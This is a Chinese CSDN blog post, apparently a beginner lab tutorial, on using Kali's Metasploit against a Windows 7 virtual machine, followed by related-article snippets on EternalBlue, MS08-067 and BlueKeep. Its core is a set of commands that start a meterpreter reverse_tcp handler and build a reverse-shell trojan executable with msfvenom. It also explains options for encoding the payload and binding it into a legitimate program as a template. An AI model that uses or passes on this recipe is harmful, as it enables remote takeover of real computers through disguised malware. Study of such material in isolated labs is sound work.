Kali Metasploit 漏洞利用(1)

最新推荐文章于 2023-12-22 16:47:35 发布
最新推荐文章于 2023-12-22 16:47:35 发布
阅读量251 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45780863/article/details/104574475
版权

实验环境

KaLi 与win7 ‘
kali ip =192.168.0.109
win7 ip =192.168.85.130

漏洞利用

1.启动Metasploit
msfconsole

2.漏洞

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
Show options
将目标IP填进去
set LHOST ip
set LPORT 端口(有默认可改)

在这里插入图片描述

生成木马

payload
msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
在这里插入图片描述
木马制造:msfpayload kali 于2015年合并于msfvenom
工具:msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
msfvenom参数:
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助

黑羽HACK快斗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux渗透基础知识整理(三):漏洞利用
blotemj.blog.csdn.net
08-08 579
Kali Linux渗透基础知识整理系列文章回顾 漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透。网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的。顾名思义,利用漏洞,达到攻击的目的。 Metasploit Framework rdesktop + hydra Sqlmap Arpspoof tcpdump + ferret + hamster Ettercap SET Metas...
CVE-2017-11882漏洞利用kali虚拟机开后门)
weixin_44279850的博客
12-27 1902
msf终端简单了解 Metasploit是一款开源的安全漏洞检测工具, Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。 MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Metasploit框架中最灵活、功能最丰富以及支持最好的工具之一。MSF终端提供了一站式的接口,能访问Metasploit框架中几乎每一...
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试习。
使用Metasploitkali Linux下进行CVE 2019-0708漏洞复现
weixin_46691674的博客
08-08 969
一、实验环境 1、kali Linux 2、windows 7或Server 2008(实验环境使用Windows7 sp1 x64) 为了顺利测试成功,远程桌面需要设为允许,防火墙也需要关闭 二、实验过程 1、将win7的环境设置完成后,放在一边并记录IP地址 2、在kali上下载并执行metasploit 3、搜索模块CVE 2019 - 0708(这里直接使用攻击模块) 4、设置target参数 (这里选用1,选错会导致目标系统蓝屏,建议按需选择) 5、设置目标地址 /6、开始执行渗透:
kali复现easy file sharing sever漏洞利用以及metasploit的简单应用
qq_51687418的博客
12-13 3168
一、easy file sharing server漏洞渗透测试 1.首先我们要在靶机安装efssetup_2018.exe程序,并运行该程序。 2.我们打开kali利用Nmap脚本扫描局域网内存活主机,发现靶机存活(Host is up)。再对目标靶机进行nmap (靶机)ip操作发现靶机80端口打开并且运行了Easy file server服务如图: kali本身有很多的漏洞利用脚本,我们在命令框输入指令查找easy file server漏洞利用脚本。 searchsploit easy file
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
kali linux msf系列视频教程
10-25
kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章...
metasploit中文wiki1
08-03
Kali Linux操作系统中,Metasploit已经预装,可以直接使用。 【安装Metasploit开发环境】 为了开发Metasploit模块,你需要建立一个开发环境。这通常包括安装必要的依赖库,设置Git以便从GitHub获取和提交代码。...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
Kali Linux Web Penetration Testing Cookbook
最新发布
05-16
此外,本还可能涵盖了一些高级话题,如使用自动化工具(如OWASP ZAP)进行自动化扫描,使用Metasploit进行exploit开发,以及如何利用社会工程来增强渗透测试效果。在每个章节末尾,作者通常会给出防御建议,帮助...
木马程序攻击+利用Windows内核漏洞提权
m0_71745258的博客
01-22 3553
再次声明,此习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,习路线并不完全一样,有机会的话我再单独梳理。
kali 漏洞攻击 win7演示
a_159357_的博客
12-22 478
首先在主页找到编辑--->虚拟网络编辑器-->添加网络-->VMnet4-->lp改为192.168.2.0 -->右键网络属性-->更改适配器设置-->右键本地网络属性--> Internet 协议版本4。控制面板-->系统和安全-->Windows防火墙-->打开或关闭Windows防火墙。( 最后重启win7)控制面板-->卸载程序-->查看已安装的更新-->全部卸载。(win7重启电脑即可恢复正常)(以上是设置攻击框架 选择漏洞 最后攻击的过程)右键计算机属性-->远程设置-->远程。
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1752
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
qq_50854662的博客
05-16 5883
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利
Kali系统MSF模块暴力破解MySQL弱口令漏洞
mooyuan的博客
11-24 8746
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
Kali WIndows 漏洞利用基础篇 (探索目标主机漏洞)
我不是猫叔
09-01 8613
通过使用Kali主机扫描工具Nmap和漏洞利用工具Msf来发现目标主机的系统漏洞和软件服务漏洞。因为很多教程只说了用什么漏洞去攻击,但是前提是该主机存在漏洞或者是该漏洞未被安装补丁(该Kali已经实体化在笔记本电脑上) 一.工具介绍 namp 一款可以探测主机的基本信息的扫描工具,数据包中包含扫描主机的开启端口,端口使用的服务,和一些系统信息。 msf一个极为强大的漏洞利用工具不管是系统漏洞...
metasploit习之路(一)简介、安装、目录结构、模块介绍
Sea_Sand息禅
07-06 4603
以前过一点基本操作,但是时间一长忘记了很多,这次打算重新打打metasploit的基础,好好习一下。 一、metasploit简介 说起metasploit,真是一个很强大的存在,其本身可以调用nmap进行强大的扫描功能,也可以和其他强大的工具进行结合使用,2003年面世以来在万网络安全领域独领风骚,使渗透操作变得很简单,甚至有的地方介绍说有了metasploit,人人皆黑客。 作为这么一个强...
kali上使用msf渗透win7(永恒之蓝操作复现)初者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
sievr的博客
02-13 1万+
一、漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。 二、影响版本 Windows 7 Windows...
kali metasploit
08-30
Kali Linux中,默认已经集成了Metasploit Framework,所以你可以直接在Kali Linux中使用Metasploit来进行渗透测试和漏洞利用。你可以使用命令"msfconsole"来启动Metasploit Framework的交互式控制台,然后可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值